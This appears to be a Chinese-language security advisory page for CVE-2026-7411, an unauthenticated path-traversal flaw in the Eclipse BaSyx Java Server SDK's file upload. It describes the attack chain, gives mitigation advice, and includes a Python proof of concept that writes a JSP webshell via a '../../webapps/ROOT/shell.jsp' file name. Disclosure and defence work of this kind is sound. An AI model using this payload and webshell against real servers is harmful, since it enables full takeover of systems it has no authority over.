CVE-2026-7411 CVSS 10.0 严重

CVE-2026-7411 Eclipse BaSyx 路径遍历致RCE漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7411

漏洞类型

路径遍历

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Eclipse BaSyx Java Server SDK

漏洞概述

Eclipse BaSyx Java Server SDK 2.0.0-milestone-10 之前的版本存在路径遍历漏洞。攻击者可利用 Submodel HTTP API 中文件上传功能的 fileName 参数缺陷，绕过路径限制写入任意文件。该漏洞无需认证即可利用，最终导致远程代码执行及系统完全沦陷。

技术细节

该漏洞的核心在于 Submodel HTTP API 处理文件上传时对 `fileName` 参数缺乏足够的路径规范化（Normalization）。攻击者可以通过在文件名中插入 `../` 序列，将上传的文件保存到 Web 根目录或其他敏感路径。由于 Java 进程拥有写入权限，攻击者可上传 JSP Webshell 或恶意 JAR 包。一旦文件被写入并被服务器解析，攻击者即可在服务器端执行任意系统命令，获取最高权限。CVSS 3.1 评分 10.0，表明该漏洞利用难度低且影响极大。

攻击链分析

STEP 1

步骤1：信息收集

攻击者扫描网络发现运行 Eclipse BaSyx Java Server SDK 的目标服务，并确认其版本低于 2.0.0-milestone-10。

STEP 2

步骤2：构建恶意请求

攻击者构造包含路径遍历字符（如 ../）的 fileName 参数，并准备恶意文件内容（如 JSP Webshell）。

STEP 3

步骤3：发送攻击载荷

向 Submodel HTTP API 的文件上传接口发送 POST 请求，利用漏洞将恶意文件写入服务器 Web 目录。

STEP 4

步骤4：执行代码与控制

访问上传的恶意文件 URL，触发服务器端解析执行，从而获取系统 Shell 权限，控制受害主机。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target-ip:port/submodels/file-upload"

# Malicious file content (e.g., JSP Webshell)
webshell_content = '<%@ page import="java.io.*" %><% Runtime.getRuntime().exec(request.getParameter("cmd")); %>'

# Exploit payload using path traversal
files = {
    'file': ('../../webapps/ROOT/shell.jsp', webshell_content, 'application/octet-stream')
}

data = {
    'fileName': '../../webapps/ROOT/shell.jsp' # The vulnerable parameter
}

try:
    response = requests.post(target_url, files=files, data=data)
    if response.status_code == 200:
        print("[+] Exploit successful! File uploaded.")
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Eclipse BaSyx Java Server SDK < 2.0.0-milestone-10

防御指南

临时缓解措施

若无法立即升级，请通过网络 ACL（访问控制列表）限制对 Submodel HTTP API 接口的访问来源，或部署 Web 应用防火墙（WAF）以检测并拦截包含 `../` 或 `%2e%2e/` 等路径遍历特征的恶意请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表